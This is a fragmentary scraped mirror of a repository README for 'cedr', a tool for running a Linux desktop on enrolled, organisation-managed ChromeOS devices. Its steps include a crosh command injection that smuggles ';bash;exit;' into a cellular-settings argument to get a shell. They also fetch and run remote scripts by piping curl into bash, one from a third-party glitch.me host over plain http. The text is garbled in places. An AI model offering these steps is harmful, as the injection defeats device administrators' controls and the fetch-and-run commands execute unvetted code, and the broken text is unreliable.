Read only mirror: the Chromeos Enrolled Desktop Runtime
rainestorme 3fd7d0fcac Update README.md | пре 1 година | |
---|---|---|
LICENSE | пре 1 година | |
README.md | пре 1 година | |
cedr-activate.sh | пре 1 година | |
cedr-bootstrap.sh | пре 1 година | |
cedr-install.sh | пре 1 година | |
cedr-mount.sh | пре 1 година | |
cedr-umount.sh | пре 1 година |
Instead, use a proper solution like fakemurk or murkmod.
cedr - the ChromeOS Enrolled Desktop Runtime
crosh
set_cellular_ppp \';bash;exit;\'
bash
bash <(curl http://hostz.glitch.me/80.sh)
bash
fdisk -l
xfce
as the target, but you can change it to whatever you want:
bash
curl https://raw.githubusercontent.com/rainestorme/cedr/main/cedr-bootstrap.sh | bash -s /dev/sdX xfce
bash
cd /home/chronos/usbdrv
./cedr-activate.sh
bash
bash <(curl http://raw.githubusercontent.com/rainestorme/cedr/main/cedr-umount.sh)
After creating a USB drive with cedr, you can remount it and launch the desktop environment with the super-duper-ultra-easy command found below:
curl https://raw.githubusercontent.com/rainestorme/cedr/main/cedr-mount.sh | bash -s /dev/sdX
Once again, replace /dev/sdX with your USB drive/SD card.
Once you're done, just do the same thing as before to unmount your drive:
bash <(curl http://raw.githubusercontent.com/rainestorme/cedr/main/cedr-umount.sh)
cedr-version
Once you're inside of a chroot session, you can open a terminal and run /bin/cedr-version
to see the version of cedr that was used to install the chroot.